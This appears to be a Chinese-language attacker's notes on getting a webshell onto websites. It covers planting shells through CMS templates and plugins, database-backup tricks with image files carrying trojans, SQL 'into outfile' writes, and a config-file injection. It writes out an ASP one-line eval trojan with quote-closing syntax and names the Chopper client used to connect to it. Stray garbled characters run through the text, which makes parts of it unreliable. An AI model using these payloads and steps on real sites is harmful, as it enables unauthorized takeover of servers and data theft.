?????????????????????????????????? 獲取webshell總結
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? 8月6號
1.CMS獲取Webshell
方法:通過百度搜索引擎搜索cms網站程序名稱
如:phpcms拿webshell瞭稼,discuz獲取webshell(通過一些模板,填ip地址的地方抓包改包蹭秋,上傳圖片木馬)衷恭,phpwind拿webshell(用戶等級管理插一句話此叠,臟話過濾插一句話,模板插一句話)随珠,WordPress拿后臺webshell
2.非CMS獲取webshell
1)數(shù)據(jù)庫備份獲取webshell
例子:
南方數(shù)據(jù)企業(yè)網站系統(tǒng)灭袁,首先在網站后臺找猬错,看有沒有數(shù)據(jù)庫備份,如果有那么你就來備份茸歧,就是你把一句話插入到圖片里面倦炒,再把圖片備份成asp,php(看他網站是用什么寫的软瞎,擴展名)逢唤。
當然還需要有后臺文件上傳的地方,我們要注意下(可能網站會限制擴展名,所以你要修改擴展名涤浇,比如.txt改為.jpg),并且找到文件上傳的路徑智玻,用火狐的插件firebug查看網絡元素,如下圖:
這里其實是沒有上傳成功芙代,是因為網站源代碼做了檢測內容吊奢,就是說你改個擴展名,雖然滿足上傳條件纹烹,但是內容被檢測出來了(看是不是真的有圖片格式)页滚。
那么他怎么判斷的呢?我們看下正常圖片和不正常圖片铺呵,正常圖片是由一個文件頭的裹驰,代表是圖片文件,不正常的圖片就沒有片挂。所以幻林!我們需要偽造圖片格式,怎么做呢音念?
我們把真正的圖片和我們的一句話木馬圖片合并(可以使用edjpgcom.exe沪饺,把真正的圖片拖到工具,然后插上一句話或者各種大馬闷愤,就生成了另一個圖片整葡,圖片正常顯示,但是圖片中包含木馬讥脐,我沒試過直接把一句話復制到真正的圖片中過遭居,但是好像別人成功過,然后linux里是可以直接合并兩個文件的)旬渠,這個時候我們上傳:
有的時候俱萍,可能在
這兩個地方是灰色的或是上傳按鈕有問題的時候,就是你上傳不了告丢,那么你可以右鍵->使用firebug審查元素枪蘑,你可以看到框架
當我們點擊提交時,我們會將文件上傳到”,,/upload_other.asp”,我們就可以通過這個路徑上傳文件啦腥寇!
我們來到數(shù)據(jù)庫備份成翩,將數(shù)據(jù)庫路徑改為我們圖片所在目錄”../UploadFiles/20164232231339933.jpg”(不過,有的網站這個地方不可編輯赦役,因為需要FSO權限).........這種情況下,我們可以通過firebug在html框架里面修改value值
此時我們成功備份麻敌,訪問我們的shell:
2)抓包上傳獲取webshell(在文件上傳漏洞,iis中間件漏洞掂摔,解析漏洞术羔,JavaScript突破...中會介紹,暫時沒記錄)
使用burp抓包乙漓。明小子也可以用(綜合上傳模塊级历,不過不怎么用了),還是使用burp吧
3)sql命令獲取webshell(用Select '' into outfile 'c:/wwwtest/eval.php')
在這個dedecms中有一個生sql命令行工具模塊
注:c:/wwwtest/eval.php呢叭披,是你在網站的根目錄常見一個名為eval的php文件(前提是你知道了網站目錄路徑寥殖,這個目錄根據(jù)不同環(huán)境當然不同)
4)模板修改獲取webshell
5)插入一句話獲取webshell
插一句話需要注意的地方,在這個南方數(shù)據(jù)企業(yè)網站管理系統(tǒng)里面涩蜘,你需要知道它的網站配置文件在INC目錄下的config.asp文件中的(你可以去網上下載這些公開的文件嚼贡,像我很簡單的那個織夢,又或者是這個同诫,down下來看看)粤策,如果這些配置文件都是寫入到asp里面的,那么我們的一句話也是可以寫入進去的误窖,一保存叮盘,就寫入配置文件了。
Asp一句話:
<%eval request("value")%>
但是我們這樣寫進去霹俺,這個頁面就崩潰了柔吼。我們需要寫成”%><%eval request("value")%><%’
那我們?yōu)槭裁匆獙懗蓪懗蛇@種形式才能起到作用呢:”%><%eval request("value")%><%’
其實<%和%>是asp文件的開端和結束標志
如果我們要在配置文件的這里:const SiteName=”南方數(shù)據(jù)企業(yè)管理系統(tǒng)”??????????? ‘網站名稱
插入一句話木馬,我們首先要閉合南方二字前的”和最開始的<%吭服,所以我們要在一句話前面加上”%>
那么后面的<%’呢嚷堡???????????? <%是閉合最后面的%>結束標志,’單引號是為了閉合網站名稱的單引號艇棕,這樣語法就不會錯了!4堋沼琉!如圖:
細心一點會發(fā)現(xiàn)我們的單引號之間不是有個”雙引號么,不會報錯么桩匪?因為這個被包含在一對閉合的單引號之間打瘪,所以不會出問題,你在后臺代碼去掉也沒問題,那我們不去掉是因為闺骚,你在前端這樣寫一句話木馬彩扔,是做不到去掉的,所以就讓他這樣放著吧
用菜刀連接僻爽,把地址寫上“http://網址/inc/config.asp”,密碼就是那個chopper
6)修改上傳類型獲取webshell
參考文章:gatarwd.iteye.com/blog/542376
https://www.webshell.ren/post-121.html
3.其他獲取webshell方法(中間件:phpmyadmin虫碉,tomcat,weblogic..)
1)PhpMyadmin(管理數(shù)據(jù)庫的軟件)獲取webshell
2)Tomcat獲取webshell
3)Weblogic獲取webshell
4)JBoss獲取webshell
